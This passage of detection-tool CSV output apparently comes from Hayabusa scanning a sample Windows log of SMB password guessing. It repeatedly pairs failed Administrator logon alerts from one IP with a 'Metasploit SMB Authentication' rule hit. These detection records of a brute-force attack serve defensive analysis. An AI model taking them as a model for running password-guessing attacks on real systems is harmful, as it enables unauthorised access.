Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 